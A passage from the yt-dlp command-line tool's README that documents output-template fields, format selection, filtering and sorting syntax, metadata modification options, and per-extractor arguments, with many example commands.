**Default**: A literal default value can be specified for when the field is empty using a `|` separator. This overrides `--output-na-placeholder`. E.g. `%(uploader|Unknown)s` 1. **More Conversions**: In addition to the normal format types `diouxXeEfFgGcrs`, yt-dlp additionally supports converting to `B` = **B**ytes, `j` = **j**son (flag `#` for pretty-printing, `+` for Unicode), `h` = HTML escaping, `l` = a comma separated **l**ist (flag `#` for `\n` newline-separated), `q` = a string **q**uoted for the terminal (flag `#` to split a list into different arguments), `D` = add **D**ecimal suffixes (e.g. 10M) (flag `#` to use 1024 as factor), and `S` = **S**anitize as filename (flag `#` for restricted) 1. **Unicode normalization**: The format type `U` can be used for NFC [Unicode normalization](https://docs.python.org/3/library/unicodedata.html#unicodedata.normalize). The alternate form flag (`#`) changes the normalization to NFD and the conversion flag `+` can be used for NFKC/NFKD compatibility equivalence normalization. E.g. `%(title)+.100U` is NFKC To summarize, the general syntax for a field is: ``` %(name[.keys][addition][>strf][,alternate][&replacement][|default])[flags][width][.precision][length]type ``` Additionally, you can set different output templates for the various metadata files separately from the general output template by specifying the type of file followed by the template separated by a colon `:`. The different file types supported are `subtitle`, `thumbnail`, `description`, `annotation` (deprecated), `infojson`, `link`, `pl_thumbnail`, `pl_description`, `pl_infojson`, `chapter`, `pl_video`. E.g. `-o "%(title)s.%(ext)s" -o "thumbnail:%(title)s\%(title)s.%(ext)s"` will put the thumbnails in a folder with the same name as the video. If any of the templates is empty, that type of file will not be written. E.g. `--write-thumbnail -o "thumbnail:"` will write thumbnails only for playlists and not for video. <a id="outtmpl-postprocess-note"/> **Note**: Due to post-processing (i.e. merging etc.), the actual output filename might differ. Use `--print after_move:filepath` to get the name after all post-processing is complete. The available fields are: - `id` (string): Video identifier - `title` (string): Video title - `fulltitle` (string): Video title ignoring live timestamp and generic title - `ext` (string): Video filename extension - `alt_title` (string): A secondary title of the video - `description` (string): The description of the video - `display_id` (string): An alternative identifier for the video - `uploader` (string): Full name of the video uploader - `license` (string): License name the video is licensed under - `creator` (string): The creator of the video - `timestamp` (numeric): UNIX timestamp of the moment the video became available - `upload_date` (string): Video upload date in UTC (YYYYMMDD) - `release_timestamp` (numeric): UNIX timestamp of the moment the video was released - `release_date` (string): The date (YYYYMMDD) when the video was released in UTC - `modified_timestamp` (numeric): UNIX timestamp of the moment the video was last modified - `modified_date` (string): The date (YYYYMMDD) when the video was last modified in UTC - `uploader_id` (string): Nickname or id of the video uploader - `channel` (string): Full name of the channel the video is uploaded on - `channel_id` (string): Id of the channel - `channel_follower_count` (numeric): Number of followers of the channel - `channel_is_verified` (boolean): Whether the channel is verified on the platform - `location` (string): Physical location where the video was filmed - `duration` (numeric): Length of the video in seconds - `duration_string` (string): Length of the video (HH:mm:ss) - `view_count` (numeric): How many users have watched the video on the platform - `concurrent_view_count` (numeric): How many users are currently watching the video on the platform. - `like_count` (numeric): Number of positive ratings of the video - `dislike_count` (numeric): Number of negative ratings of the video - `repost_count` (numeric): Number of reposts of the video - `average_rating` (numeric): Average rating give by users, the scale used depends on the webpage - `comment_count` (numeric): Number of comments on the video (For some extractors, comments are only downloaded at the end, and so this field cannot be used) - `age_limit` (numeric): Age restriction for the video (years) - `live_status` (string): One of "not_live", "is_live", "is_upcoming", "was_live", "post_live" (was live, but VOD is not yet processed) - `is_live` (boolean): Whether this video is a live stream or a fixed-length video - `was_live` (boolean): Whether this video was originally a live stream - `playable_in_embed` (string): Whether this video is allowed to play in embedded players on other sites - `availability` (string): Whether the video is "private", "premium_only", "subscriber_only", "needs_auth", "unlisted" or "public" - `start_time` (numeric): Time in seconds where the reproduction should start, as specified in the URL - `end_time` (numeric): Time in seconds where the reproduction should end, as specified in the URL - `extractor` (string): Name of the extractor - `extractor_key` (string): Key name of the extractor - `epoch` (numeric): Unix epoch of when the information extraction was completed - `autonumber` (numeric): Number that will be increased with each download, starting at `--autonumber-start`, padded with leading zeros to 5 digits - `video_autonumber` (numeric): Number that will be increased with each video - `n_entries` (numeric): Total number of extracted items in the playlist - `playlist_id` (string): Identifier of the playlist that contains the video - `playlist_title` (string): Name of the playlist that contains the video - `playlist` (string): `playlist_id` or `playlist_title` - `playlist_count` (numeric): Total number of items in the playlist. May not be known if entire playlist is not extracted - `playlist_index` (numeric): Index of the video in the playlist padded with leading zeros according the final index - `playlist_autonumber` (numeric): Position of the video in the playlist download queue padded with leading zeros according to the total length of the playlist - `playlist_uploader` (string): Full name of the playlist uploader - `playlist_uploader_id` (string): Nickname or id of the playlist uploader - `webpage_url` (string): A URL to the video webpage which if given to yt-dlp should allow to get the same result again - `webpage_url_basename` (string): The basename of the webpage URL - `webpage_url_domain` (string): The domain of the webpage URL - `original_url` (string): The URL given by the user (or same as `webpage_url` for playlist entries) All the fields in [Filtering Formats](#filtering-formats) can also be used Available for the video that belongs to some logical chapter or section: - `chapter` (string): Name or title of the chapter the video belongs to - `chapter_number` (numeric): Number of the chapter the video belongs to - `chapter_id` (string): Id of the chapter the video belongs to Available for the video that is an episode of some series or programme: - `series` (string): Title of the series or programme the video episode belongs to - `season` (string): Title of the season the video episode belongs to - `season_number` (numeric): Number of the season the video episode belongs to - `season_id` (string): Id of the season the video episode belongs to - `episode` (string): Title of the video episode - `episode_number` (numeric): Number of the video episode within a season - `episode_id` (string): Id of the video episode Available for the media that is a track or a part of a music album: - `track` (string): Title of the track - `track_number` (numeric): Number of the track within an album or a disc - `track_id` (string): Id of the track - `artist` (string): Artist(s) of the track - `genre` (string): Genre(s) of the track - `album` (string): Title of the album the track belongs to - `album_type` (string): Type of the album - `album_artist` (string): List of all artists appeared on the album - `disc_number` (numeric): Number of the disc or other physical medium the track belongs to - `release_year` (numeric): Year (YYYY) when the album was released Available only when using `--download-sections` and for `chapter:` prefix when using `--split-chapters` for videos with internal chapters: - `section_title` (string): Title of the chapter - `section_number` (numeric): Number of the chapter within the file - `section_start` (numeric): Start time of the chapter in seconds - `section_end` (numeric): End time of the chapter in seconds Available only when used in `--print`: - `urls` (string): The URLs of all requested formats, one in each line - `filename` (string): Name of the video file. Note that the [actual filename may differ](#outtmpl-postprocess-note) - `formats_table` (table): The video format table as printed by `--list-formats` - `thumbnails_table` (table): The thumbnail format table as printed by `--list-thumbnails` - `subtitles_table` (table): The subtitle format table as printed by `--list-subs` - `automatic_captions_table` (table): The automatic subtitle format table as printed by `--list-subs` Available only after the video is downloaded (`post_process`/`after_move`): - `filepath`: Actual path of downloaded video file Available only in `--sponsorblock-chapter-title`: - `start_time` (numeric): Start time of the chapter in seconds - `end_time` (numeric): End time of the chapter in seconds - `categories` (list): The [SponsorBlock categories](https://wiki.sponsor.ajay.app/w/Types#Category) the chapter belongs to - `category` (string): The smallest SponsorBlock category the chapter belongs to - `category_names` (list): Friendly names of the categories - `name` (string): Friendly name of the smallest category - `type` (string): The [SponsorBlock action type](https://wiki.sponsor.ajay.app/w/Types#Action_Type) of the chapter Each aforementioned sequence when referenced in an output template will be replaced by the actual value corresponding to the sequence name. E.g. for `-o %(title)s-%(id)s.%(ext)s` and an mp4 video with title `yt-dlp test video` and id `BaW_jenozKc`, this will result in a `yt-dlp test video-BaW_jenozKc.mp4` file created in the current directory. **Note**: Some of the sequences are not guaranteed to be present since they depend on the metadata obtained by a particular extractor. Such sequences will be replaced with placeholder value provided with `--output-na-placeholder` (`NA` by default). **Tip**: Look at the `-j` output to identify which fields are available for the particular URL For numeric sequences you can use [numeric related formatting](https://docs.python.org/3/library/stdtypes.html#printf-style-string-formatting); e.g. `%(view_count)05d` will result in a string with view count padded with zeros up to 5 characters, like in `00042`. Output templates can also contain arbitrary hierarchical path, e.g. `-o "%(playlist)s/%(playlist_index)s - %(title)s.%(ext)s"` which will result in downloading each video in a directory corresponding to this path template. Any missing directory will be automatically created for you. To use percent literals in an output template use `%%`. To output to stdout use `-o -`. The current default template is `%(title)s [%(id)s].%(ext)s`. In some cases, you don't want special characters such as ไธญ, spaces, or &, such as when transferring the downloaded filename to a Windows system or the filename through an 8bit-unsafe channel. In these cases, add the `--restrict-filenames` flag to get a shorter title. #### Output template examples ```bash $ yt-dlp --print filename -o "test video.%(ext)s" BaW_jenozKc test video.webm # Literal name with correct extension $ yt-dlp --print filename -o "%(title)s.%(ext)s" BaW_jenozKc youtube-dl test video ''_รคโ†ญ๐•.webm # All kinds of weird characters $ yt-dlp --print filename -o "%(title)s.%(ext)s" BaW_jenozKc --restrict-filenames youtube-dl_test_video_.webm # Restricted file name # Download YouTube playlist videos in separate directory indexed by video order in a playlist $ yt-dlp -o "%(playlist)s/%(playlist_index)s - %(title)s.%(ext)s" "https://www.youtube.com/playlist?list=PLwiyx1dc3P2JR9N8gQaQN_BCvlSlap7re" # Download YouTube playlist videos in separate directories according to their uploaded year $ yt-dlp -o "%(upload_date>%Y)s/%(title)s.%(ext)s" "https://www.youtube.com/playlist?list=PLwiyx1dc3P2JR9N8gQaQN_BCvlSlap7re" # Prefix playlist index with " - " separator, but only if it is available $ yt-dlp -o "%(playlist_index&{} - |)s%(title)s.%(ext)s" BaW_jenozKc "https://www.youtube.com/user/TheLinuxFoundation/playlists" # Download all playlists of YouTube channel/user keeping each playlist in separate directory: $ yt-dlp -o "%(uploader)s/%(playlist)s/%(playlist_index)s - %(title)s.%(ext)s" "https://www.youtube.com/user/TheLinuxFoundation/playlists" # Download Udemy course keeping each chapter in separate directory under MyVideos directory in your home $ yt-dlp -u user -p password -P "~/MyVideos" -o "%(playlist)s/%(chapter_number)s - %(chapter)s/%(title)s.%(ext)s" "https://www.udemy.com/java-tutorial" # Download entire series season keeping each series and each season in separate directory under C:/MyVideos $ yt-dlp -P "C:/MyVideos" -o "%(series)s/%(season_number)s - %(season)s/%(episode_number)s - %(episode)s.%(ext)s" "https://videomore.ru/kino_v_detalayah/5_sezon/367617" # Download video as "C:\MyVideos\uploader\title.ext", subtitles as "C:\MyVideos\subs\uploader\title.ext" # and put all temporary files in "C:\MyVideos\tmp" $ yt-dlp -P "C:/MyVideos" -P "temp:tmp" -P "subtitle:subs" -o "%(uploader)s/%(title)s.%(ext)s" BaW_jenoz --write-subs # Download video as "C:\MyVideos\uploader\title.ext" and subtitles as "C:\MyVideos\uploader\subs\title.ext" $ yt-dlp -P "C:/MyVideos" -o "%(uploader)s/%(title)s.%(ext)s" -o "subtitle:%(uploader)s/subs/%(title)s.%(ext)s" BaW_jenozKc --write-subs # Stream the video being downloaded to stdout $ yt-dlp -o - BaW_jenozKc ``` # FORMAT SELECTION By default, yt-dlp tries to download the best available quality if you **don't** pass any options. This is generally equivalent to using `-f bestvideo*+bestaudio/best`. However, if multiple audiostreams is enabled (`--audio-multistreams`), the default format changes to `-f bestvideo+bestaudio/best`. Similarly, if ffmpeg is unavailable, or if you use yt-dlp to stream to `stdout` (`-o -`), the default becomes `-f best/bestvideo+bestaudio`. **Deprecation warning**: Latest versions of yt-dlp can stream multiple formats to the stdout simultaneously using ffmpeg. So, in future versions, the default for this will be set to `-f bv*+ba/b` similar to normal downloads. If you want to preserve the `-f b/bv+ba` setting, it is recommended to explicitly specify it in the configuration options. The general syntax for format selection is `-f FORMAT` (or `--format FORMAT`) where `FORMAT` is a *selector expression*, i.e. an expression that describes format or formats you would like to download. <!-- MANPAGE: BEGIN EXCLUDED SECTION --> **tl;dr:** [navigate me to examples](#format-selection-examples). <!-- MANPAGE: END EXCLUDED SECTION --> The simplest case is requesting a specific format; e.g. with `-f 22` you can download the format with format code equal to 22. You can get the list of available format codes for particular video using `--list-formats` or `-F`. Note that these format codes are extractor specific. You can also use a file extension (currently `3gp`, `aac`, `flv`, `m4a`, `mp3`, `mp4`, `ogg`, `wav`, `webm` are supported) to download the best quality format of a particular file extension served as a single file, e.g. `-f webm` will download the best quality format with the `webm` extension served as a single file. You can use `-f -` to interactively provide the format selector *for each video* You can also use special names to select particular edge case formats: - `all`: Select **all formats** separately - `mergeall`: Select and **merge all formats** (Must be used with `--audio-multistreams`, `--video-multistreams` or both) - `b*`, `best*`: Select the best quality format that **contains either** a video or an audio or both (ie; `vcodec!=none or acodec!=none`) - `b`, `best`: Select the best quality format that **contains both** video and audio. Equivalent to `best*[vcodec!=none][acodec!=none]` - `bv`, `bestvideo`: Select the best quality **video-only** format. Equivalent to `best*[acodec=none]` - `bv*`, `bestvideo*`: Select the best quality format that **contains video**. It may also contain audio. Equivalent to `best*[vcodec!=none]` - `ba`, `bestaudio`: Select the best quality **audio-only** format. Equivalent to `best*[vcodec=none]` - `ba*`, `bestaudio*`: Select the best quality format that **contains audio**. It may also contain video. Equivalent to `best*[acodec!=none]` ([Do not use!](https://github.com/yt-dlp/yt-dlp/issues/979#issuecomment-919629354)) - `w*`, `worst*`: Select the worst quality format that contains either a video or an audio - `w`, `worst`: Select the worst quality format that contains both video and audio. Equivalent to `worst*[vcodec!=none][acodec!=none]` - `wv`, `worstvideo`: Select the worst quality video-only format. Equivalent to `worst*[acodec=none]` - `wv*`, `worstvideo*`: Select the worst quality format that contains video. It may also contain audio. Equivalent to `worst*[vcodec!=none]` - `wa`, `worstaudio`: Select the worst quality audio-only format. Equivalent to `worst*[vcodec=none]` - `wa*`, `worstaudio*`: Select the worst quality format that contains audio. It may also contain video. Equivalent to `worst*[acodec!=none]` For example, to download the worst quality video-only format you can use `-f worstvideo`. It is however recommended not to use `worst` and related options. When your format selector is `worst`, the format which is worst in all respects is selected. Most of the time, what you actually want is the video with the smallest filesize instead. So it is generally better to use `-S +size` or more rigorously, `-S +size,+br,+res,+fps` instead of `-f worst`. See [Sorting Formats](#sorting-formats) for more details. You can select the n'th best format of a type by using `best<type>.<n>`. For example, `best.2` will select the 2nd best combined format. Similarly, `bv*.3` will select the 3rd best format that contains a video stream. If you want to download multiple videos, and they don't have the same formats available, you can specify the order of preference using slashes. Note that formats on the left hand side are preferred; e.g. `-f 22/17/18` will download format 22 if it's available, otherwise it will download format 17 if it's available, otherwise it will download format 18 if it's available, otherwise it will complain that no suitable formats are available for download. If you want to download several formats of the same video use a comma as a separator, e.g. `-f 22,17,18` will download all these three formats, of course if they are available. Or a more sophisticated example combined with the precedence feature: `-f 136/137/mp4/bestvideo,140/m4a/bestaudio`. You can merge the video and audio of multiple formats into a single file using `-f <format1>+<format2>+...` (requires ffmpeg installed); e.g. `-f bestvideo+bestaudio` will download the best video-only format, the best audio-only format and mux them together with ffmpeg. **Deprecation warning**: Since the *below* described behavior is complex and counter-intuitive, this will be removed and multistreams will be enabled by default in the future. A new operator will be instead added to limit formats to single audio/video Unless `--video-multistreams` is used, all formats with a video stream except the first one are ignored. Similarly, unless `--audio-multistreams` is used, all formats with an audio stream except the first one are ignored. E.g. `-f bestvideo+best+bestaudio --video-multistreams --audio-multistreams` will download and merge all 3 given formats. The resulting file will have 2 video streams and 2 audio streams. But `-f bestvideo+best+bestaudio --no-video-multistreams` will download and merge only `bestvideo` and `bestaudio`. `best` is ignored since another format containing a video stream (`bestvideo`) has already been selected. The order of the formats is therefore important. `-f best+bestaudio --no-audio-multistreams` will download only `best` while `-f bestaudio+best --no-audio-multistreams` will ignore `best` and download only `bestaudio`. ## Filtering Formats You can also filter the video formats by putting a condition in brackets, as in `-f "best[height=720]"` (or `-f "[filesize>10M]"` since filters without a selector are interpreted as `best`). The following numeric meta fields can be used with comparisons `<`, `<=`, `>`, `>=`, `=` (equals), `!=` (not equals): - `filesize`: The number of bytes, if known in advance - `filesize_approx`: An estimate for the number of bytes - `width`: Width of the video, if known - `height`: Height of the video, if known - `aspect_ratio`: Aspect ratio of the video, if known - `tbr`: Average bitrate of audio and video in KBit/s - `abr`: Average audio bitrate in KBit/s - `vbr`: Average video bitrate in KBit/s - `asr`: Audio sampling rate in Hertz - `fps`: Frame rate - `audio_channels`: The number of audio channels - `stretched_ratio`: `width:height` of the video's pixels, if not square Also filtering work for comparisons `=` (equals), `^=` (starts with), `$=` (ends with), `*=` (contains), `~=` (matches regex) and following string meta fields: - `url`: Video URL - `ext`: File extension - `acodec`: Name of the audio codec in use - `vcodec`: Name of the video codec in use - `container`: Name of the container format - `protocol`: The protocol that will be used for the actual download, lower-case (`http`, `https`, `rtsp`, `rtmp`, `rtmpe`, `mms`, `f4m`, `ism`, `http_dash_segments`, `m3u8`, or `m3u8_native`) - `language`: Language code - `dynamic_range`: The dynamic range of the video - `format_id`: A short description of the format - `format`: A human-readable description of the format - `format_note`: Additional info about the format - `resolution`: Textual description of width and height Any string comparison may be prefixed with negation `!` in order to produce an opposite comparison, e.g. `!*=` (does not contain). The comparand of a string comparison needs to be quoted with either double or single quotes if it contains spaces or special characters other than `._-`. **Note**: None of the aforementioned meta fields are guaranteed to be present since this solely depends on the metadata obtained by particular extractor, i.e. the metadata offered by the website. Any other field made available by the extractor can also be used for filtering. Formats for which the value is not known are excluded unless you put a question mark (`?`) after the operator. You can combine format filters, so `-f "bv[height<=?720][tbr>500]"` selects up to 720p videos (or videos where the height is not known) with a bitrate of at least 500 KBit/s. You can also use the filters with `all` to download all formats that satisfy the filter, e.g. `-f "all[vcodec=none]"` selects all audio-only formats. Format selectors can also be grouped using parentheses; e.g. `-f "(mp4,webm)[height<480]"` will download the best pre-merged mp4 and webm formats with a height lower than 480. ## Sorting Formats You can change the criteria for being considered the `best` by using `-S` (`--format-sort`). The general format for this is `--format-sort field1,field2...`. The available fields are: - `hasvid`: Gives priority to formats that have a video stream - `hasaud`: Gives priority to formats that have an audio stream - `ie_pref`: The format preference - `lang`: The language preference - `quality`: The quality of the format - `source`: The preference of the source - `proto`: Protocol used for download (`https`/`ftps` > `http`/`ftp` > `m3u8_native`/`m3u8` > `http_dash_segments`> `websocket_frag` > `mms`/`rtsp` > `f4f`/`f4m`) - `vcodec`: Video Codec (`av01` > `vp9.2` > `vp9` > `h265` > `h264` > `vp8` > `h263` > `theora` > other) - `acodec`: Audio Codec (`flac`/`alac` > `wav`/`aiff` > `opus` > `vorbis` > `aac` > `mp4a` > `mp3` > `ac4` > `eac3` > `ac3` > `dts` > other) - `codec`: Equivalent to `vcodec,acodec` - `vext`: Video Extension (`mp4` > `mov` > `webm` > `flv` > other). If `--prefer-free-formats` is used, `webm` is preferred. - `aext`: Audio Extension (`m4a` > `aac` > `mp3` > `ogg` > `opus` > `webm` > other). If `--prefer-free-formats` is used, the order changes to `ogg` > `opus` > `webm` > `mp3` > `m4a` > `aac` - `ext`: Equivalent to `vext,aext` - `filesize`: Exact filesize, if known in advance - `fs_approx`: Approximate filesize - `size`: Exact filesize if available, otherwise approximate filesize - `height`: Height of video - `width`: Width of video - `res`: Video resolution, calculated as the smallest dimension. - `fps`: Framerate of video - `hdr`: The dynamic range of the video (`DV` > `HDR12` > `HDR10+` > `HDR10` > `HLG` > `SDR`) - `channels`: The number of audio channels - `tbr`: Total average bitrate in KBit/s - `vbr`: Average video bitrate in KBit/s - `abr`: Average audio bitrate in KBit/s - `br`: Average bitrate in KBit/s, `tbr`/`vbr`/`abr` - `asr`: Audio sample rate in Hz **Deprecation warning**: Many of these fields have (currently undocumented) aliases, that may be removed in a future version. It is recommended to use only the documented field names. All fields, unless specified otherwise, are sorted in descending order. To reverse this, prefix the field with a `+`. E.g. `+res` prefers format with the smallest resolution. Additionally, you can suffix a preferred value for the fields, separated by a `:`. E.g. `res:720` prefers larger videos, but no larger than 720p and the smallest video if there are no videos less than 720p. For `codec` and `ext`, you can provide two preferred values, the first for video and the second for audio. E.g. `+codec:avc:m4a` (equivalent to `+vcodec:avc,+acodec:m4a`) sets the video codec preference to `h264` > `h265` > `vp9` > `vp9.2` > `av01` > `vp8` > `h263` > `theora` and audio codec preference to `mp4a` > `aac` > `vorbis` > `opus` > `mp3` > `ac3` > `dts`. You can also make the sorting prefer the nearest values to the provided by using `~` as the delimiter. E.g. `filesize~1G` prefers the format with filesize closest to 1 GiB. The fields `hasvid` and `ie_pref` are always given highest priority in sorting, irrespective of the user-defined order. This behaviour can be changed by using `--format-sort-force`. Apart from these, the default order used is: `lang,quality,res,fps,hdr:12,vcodec:vp9.2,channels,acodec,size,br,asr,proto,ext,hasaud,source,id`. The extractors may override this default order, but they cannot override the user-provided order. Note that the default has `vcodec:vp9.2`; i.e. `av1` is not preferred. Similarly, the default for hdr is `hdr:12`; i.e. dolby vision is not preferred. These choices are made since DV and AV1 formats are not yet fully compatible with most devices. This may be changed in the future as more devices become capable of smoothly playing back these formats. If your format selector is `worst`, the last item is selected after sorting. This means it will select the format that is worst in all respects. Most of the time, what you actually want is the video with the smallest filesize instead. So it is generally better to use `-f best -S +size,+br,+res,+fps`. **Tip**: You can use the `-v -F` to see how the formats have been sorted (worst to best). ## Format Selection examples ```bash # Download and merge the best video-only format and the best audio-only format, # or download the best combined format if video-only format is not available $ yt-dlp -f "bv+ba/b" # Download best format that contains video, # and if it doesn't already have an audio stream, merge it with best audio-only format $ yt-dlp -f "bv*+ba/b" # Same as above $ yt-dlp # Download the best video-only format and the best audio-only format without merging them # For this case, an output template should be used since # by default, bestvideo and bestaudio will have the same file name. $ yt-dlp -f "bv,ba" -o "%(title)s.f%(format_id)s.%(ext)s" # Download and merge the best format that has a video stream, # and all audio-only formats into one file $ yt-dlp -f "bv*+mergeall[vcodec=none]" --audio-multistreams # Download and merge the best format that has a video stream, # and the best 2 audio-only formats into one file $ yt-dlp -f "bv*+ba+ba.2" --audio-multistreams # The following examples show the old method (without -S) of format selection # and how to use -S to achieve a similar but (generally) better result # Download the worst video available (old method) $ yt-dlp -f "wv*+wa/w" # Download the best video available but with the smallest resolution $ yt-dlp -S "+res" # Download the smallest video available $ yt-dlp -S "+size,+br" # Download the best mp4 video available, or the best video if no mp4 available $ yt-dlp -f "bv*[ext=mp4]+ba[ext=m4a]/b[ext=mp4] / bv*+ba/b" # Download the best video with the best extension # (For video, mp4 > mov > webm > flv. For audio, m4a > aac > mp3 ...) $ yt-dlp -S "ext" # Download the best video available but no better than 480p, # or the worst video if there is no video under 480p $ yt-dlp -f "bv*[height<=480]+ba/b[height<=480] / wv*+ba/w" # Download the best video available with the largest height but no better than 480p, # or the best video with the smallest resolution if there is no video under 480p $ yt-dlp -S "height:480" # Download the best video available with the largest resolution but no better than 480p, # or the best video with the smallest resolution if there is no video under 480p # Resolution is determined by using the smallest dimension. # So this works correctly for vertical videos as well $ yt-dlp -S "res:480" # Download the best video (that also has audio) but no bigger than 50 MB, # or the worst video (that also has audio) if there is no video under 50 MB $ yt-dlp -f "b[filesize<50M] / w" # Download largest video (that also has audio) but no bigger than 50 MB, # or the smallest video (that also has audio) if there is no video under 50 MB $ yt-dlp -f "b" -S "filesize:50M" # Download best video (that also has audio) that is closest in size to 50 MB $ yt-dlp -f "b" -S "filesize~50M" # Download best video available via direct link over HTTP/HTTPS protocol, # or the best video available via any protocol if there is no such video $ yt-dlp -f "(bv*+ba/b)[protocol^=http][protocol!*=dash] / (bv*+ba/b)" # Download best video available via the best protocol # (https/ftps > http/ftp > m3u8_native > m3u8 > http_dash_segments ...) $ yt-dlp -S "proto" # Download the best video with either h264 or h265 codec, # or the best video if there is no such video $ yt-dlp -f "(bv*[vcodec~='^((he|a)vc|h26[45])']+ba) / (bv*+ba/b)" # Download the best video with best codec no better than h264, # or the best video with worst codec if there is no such video $ yt-dlp -S "codec:h264" # Download the best video with worst codec no worse than h264, # or the best video with best codec if there is no such video $ yt-dlp -S "+codec:h264" # More complex examples # Download the best video no better than 720p preferring framerate greater than 30, # or the worst video (still preferring framerate greater than 30) if there is no such video $ yt-dlp -f "((bv*[fps>30]/bv*)[height<=720]/(wv*[fps>30]/wv*)) + ba / (b[fps>30]/b)[height<=720]/(w[fps>30]/w)" # Download the video with the largest resolution no better than 720p, # or the video with the smallest resolution available if there is no such video, # preferring larger framerate for formats with the same resolution $ yt-dlp -S "res:720,fps" # Download the video with smallest resolution no worse than 480p, # or the video with the largest resolution available if there is no such video, # preferring better codec and then larger total bitrate for the same resolution $ yt-dlp -S "+res:480,codec,br" ``` # MODIFYING METADATA The metadata obtained by the extractors can be modified by using `--parse-metadata` and `--replace-in-metadata` `--replace-in-metadata FIELDS REGEX REPLACE` is used to replace text in any metadata field using [python regular expression](https://docs.python.org/3/library/re.html#regular-expression-syntax). [Backreferences](https://docs.python.org/3/library/re.html?highlight=backreferences#re.sub) can be used in the replace string for advanced use. The general syntax of `--parse-metadata FROM:TO` is to give the name of a field or an [output template](#output-template) to extract data from, and the format to interpret it as, separated by a colon `:`. Either a [python regular expression](https://docs.python.org/3/library/re.html#regular-expression-syntax) with named capture groups, a single field name, or a similar syntax to the [output template](#output-template) (only `%(field)s` formatting is supported) can be used for `TO`. The option can be used multiple times to parse and modify various fields. Note that these options preserve their relative order, allowing replacements to be made in parsed fields and viceversa. Also, any field thus created can be used in the [output template](#output-template) and will also affect the media file's metadata added when using `--embed-metadata`. This option also has a few special uses: * You can download an additional URL based on the metadata of the currently downloaded video. To do this, set the field `additional_urls` to the URL that you want to download. E.g. `--parse-metadata "description:(?P<additional_urls>https?://www\.vimeo\.com/\d+)"` will download the first vimeo video found in the description * You can use this to change the metadata that is embedded in the media file. To do this, set the value of the corresponding field with a `meta_` prefix. For example, any value you set to `meta_description` field will be added to the `description` field in the file - you can use this to set a different "description" and "synopsis". To modify the metadata of individual streams, use the `meta<n>_` prefix (e.g. `meta1_language`). Any value set to the `meta_` field will overwrite all default values. **Note**: Metadata modification happens before format selection, post-extraction and other post-processing operations. Some fields may be added or changed during these steps, overriding your changes. For reference, these are the fields yt-dlp adds by default to the file metadata: Metadata fields | From :--------------------------|:------------------------------------------------ `title` | `track` or `title` `date` | `upload_date` `description`, `synopsis` | `description` `purl`, `comment` | `webpage_url` `track` | `track_number` `artist` | `artist`, `creator`, `uploader` or `uploader_id` `genre` | `genre` `album` | `album` `album_artist` | `album_artist` `disc` | `disc_number` `show` | `series` `season_number` | `season_number` `episode_id` | `episode` or `episode_id` `episode_sort` | `episode_number` `language` of each stream | the format's `language` **Note**: The file format may not support some of these fields ## Modifying metadata examples ```bash # Interpret the title as "Artist - Title" $ yt-dlp --parse-metadata "title:%(artist)s - %(title)s" # Regex example $ yt-dlp --parse-metadata "description:Artist - (?P<artist>.+)" # Set title as "Series name S01E05" $ yt-dlp --parse-metadata "%(series)s S%(season_number)02dE%(episode_number)02d:%(title)s" # Prioritize uploader as the "artist" field in video metadata $ yt-dlp --parse-metadata "%(uploader|)s:%(meta_artist)s" --embed-metadata # Set "comment" field in video metadata using description instead of webpage_url, # handling multiple lines correctly $ yt-dlp --parse-metadata "description:(?s)(?P<meta_comment>.+)" --embed-metadata # Do not set any "synopsis" in the video metadata $ yt-dlp --parse-metadata ":(?P<meta_synopsis>)" # Remove "formats" field from the infojson by setting it to an empty string $ yt-dlp --parse-metadata "video::(?P<formats>)" --write-info-json # Replace all spaces and "_" in title and uploader with a `-` $ yt-dlp --replace-in-metadata "title,uploader" "[ _]" "-" ``` # EXTRACTOR ARGUMENTS Some extractors accept additional arguments which can be passed using `--extractor-args KEY:ARGS`. `ARGS` is a `;` (semicolon) separated string of `ARG=VAL1,VAL2`. E.g. `--extractor-args "youtube:player-client=android_embedded,web;include_live_dash" --extractor-args "funimation:version=uncut"` Note: In CLI, `ARG` can use `-` instead of `_`; e.g. `youtube:player-client"` becomes `youtube:player_client"` The following extractors use this feature: #### youtube * `lang`: Prefer translated metadata (`title`, `description` etc) of this language code (case-sensitive). By default, the video primary language metadata is preferred, with a fallback to `en` translated. See [youtube.py](https://github.com/yt-dlp/yt-dlp/blob/c26f9b991a0681fd3ea548d535919cec1fbbd430/yt_dlp/extractor/youtube.py#L381-L390) for list of supported content language codes * `skip`: One or more of `hls`, `dash` or `translated_subs` to skip extraction of the m3u8 manifests, dash manifests and [auto-translated subtitles](https://github.com/yt-dlp/yt-dlp/issues/4090#issuecomment-1158102032) respectively * `player_client`: Clients to extract video data from. The main clients are `web`, `android` and `ios` with variants `_music`, `_embedded`, `_embedscreen`, `_creator` (e.g. `web_embedded`); and `mweb` and `tv_embedded` (agegate bypass) with no variants. By default, `ios,android,web` is used, but `tv_embedded` and `creator` variants are added as required for age-gated videos. Similarly, the music variants are added for `music.youtube.com` urls. You can use `all` to use all the clients, and `default` for the default clients. * `player_skip`: Skip some network requests that are generally needed for robust extraction. One or more of `configs` (skip client configs), `webpage` (skip initial webpage), `js` (skip js player). While these options can help reduce the number of requests needed or avoid some rate-limiting, they could cause some issues. See [#860](https://github.com/yt-dlp/yt-dlp/pull/860) for more details * `player_params`: YouTube player parameters to use for player requests. Will overwrite any default ones set by yt-dlp. * `comment_sort`: `top` or `new` (default) - choose comment sorting mode (on YouTube's side) * `max_comments`: Limit the amount of comments to gather. Comma-separated list of integers representing `max-comments,max-parents,max-replies,max-replies-per-thread`. Default is `all,all,all,all` * E.g. `all,all,1000,10` will get a maximum of 1000 replies total, with up to 10 replies per thread. `1000,all,100` will get a maximum of 1000 comments, with a maximum of 100 replies total * `formats`: Change the types of formats to return. `dashy` (convert HTTP to DASH), `duplicate` (identical content but different URLs or protocol; includes `dashy`), `incomplete` (cannot be downloaded completely - live dash and post-live m3u8) * `innertube_host`: Innertube API host to use for all API requests; e.g. `studio.youtube.com`, `youtubei.googleapis.com`. Note that cookies exported from one subdomain will not work on others * `innertube_key`: Innertube API key to use for all API requests #### youtubetab (YouTube playlists, channels, feeds, etc.) * `skip`: One or more of `webpage` (skip initial webpage download), `authcheck` (allow the download of playlists requiring authentication when no initial webpage is downloaded. This may cause unwanted behavior, see [#1122](https://github.com/yt-dlp/yt-dlp/pull/1122) for more details) * `approximate_date`: Extract approximate `upload_date` and `timestamp` in flat-playlist. This may cause date-based filters to be slightly off #### generic * `fragment_query`: Passthrough any query in mpd/m3u8 manifest URLs to their fragments if no value is provided, or else apply the query string given as `fragment_query=VALUE`. Does not apply to ffmpeg * `variant_query`: Passthrough the master m3u8 